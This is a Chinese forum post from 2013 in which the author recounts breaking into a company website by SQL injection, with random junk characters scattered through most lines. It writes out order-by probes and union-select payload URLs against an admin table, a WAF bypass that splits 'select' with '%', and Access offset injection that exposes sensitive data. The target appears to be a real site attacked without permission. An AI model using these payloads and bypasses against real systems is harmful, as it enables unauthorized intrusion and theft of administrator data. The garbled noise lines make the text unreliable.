打开网站,一个企业站。
( _. l) p* ?' c+ t. s" z7 _% U4 W. `4 v& z" {, u$ Z" |. K
6 C' K+ @# M# r( X8 d7 }8 d; E
顺手加个admin) L9 p! I2 e9 h. T
^9 a7 e F: }9 C+ ^ e2 O+ _
$ ^$ C' |8 Q6 s4 y默认后台。- B; \9 @3 W% y- |5 s
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。8 ^ |$ R- E; U" E. p. w
( Q! J- @' G2 C' ~# q3 y0 F
1 y- E5 ~7 K, m& {6 ~
( P8 g# H4 E. h- D. D$ l4 i( b2 P$ _所以就不用御剑扫了,待会直接封IP。+ S+ P0 k7 f& j
& y2 s0 Z3 Q- V( O/ O/ t$ i用order by语句判断是否存在注入。
$ s6 f0 G) b0 E5 I! {3 Whttp://www.xxx.com /product_show.asp?id=997 order by 1
) m7 N1 ~5 o: ]6 H9 C* Zhttp://www.xxx.com /product_show.asp?id=997 order by 1004 S" p, j" |/ k8 {
现在存在注入,经测试后发现是9个字段。5 O* u* F1 A# B0 w: @
7 H) P0 E/ x' L1 B5 l4 h
接下来进行联合查询,猜是否存在admin表。8 p/ |. _3 m0 C- F! P
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。% P' t; F2 S" D+ @* o
* {" E) ]! i; F# l- u% J1 A ]% _
* o/ g3 K7 O1 o# b
' H; f6 u3 Z1 d' e6 U$ V在select中间加个%,se%lect绕过安全狗。
. s( I" I5 w, r! n* _/ @; _: o( ?. s+ B1 ~2 |
3 Q: [9 l- y( l) P
发现存在admin表,然后开始手工猜常用的字段。
" y3 ]; @& M! u纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
% f+ J" X( p* |1 ?. I * i# J1 s( a( K) E' w
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
: m# u; S* k3 G! |9 t; `0 m & x4 ^: R! v$ e" {( K
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
/ ~7 U' E/ W6 ^' ohttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin# z2 y" P- Y' y+ u/ |
好了,敏感内容出显了。# R! [+ T9 H) o5 o* z) T: ?) l7 g" W) O
/ e* B1 V9 T( H. E0 r+ H
* `. Y* Z% ~9 w) a: x3 f. Q! Q0 o" Z1 Y: \& [; b, l% ?
|
发表于 2013-3-8 21:49:45
收藏
支持
反对